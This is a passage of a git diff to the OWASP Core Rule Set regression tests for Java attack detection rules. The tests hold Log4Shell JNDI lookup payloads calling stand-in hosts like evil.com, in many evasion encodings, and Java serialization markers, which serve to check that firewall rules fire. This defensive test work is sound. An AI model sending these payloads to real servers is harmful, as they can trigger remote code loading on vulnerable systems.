method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-26 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index 288c536ec..8016cdce6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,17 +1,15 @@ --- meta: author: "spartantri" - enabled: true - name: "944200.yaml" - description: "Description" +rule_id: 944200 tests: - - test_title: 944200-1 + - test_id: 1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" - output: - log_contains: "id \"944200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" + output: + log: + expect_ids: [944200] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index da10d5c1b..8aa888914 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -1,1108 +1,1106 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944210.yaml" - description: "Positive tests for rule 944210" +rule_id: 944210 tests: - - test_title: 944210-1 + - test_id: 1 desc: "Argument test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log: + expect_ids: [944210] + - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log: + expect_ids: [944210] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 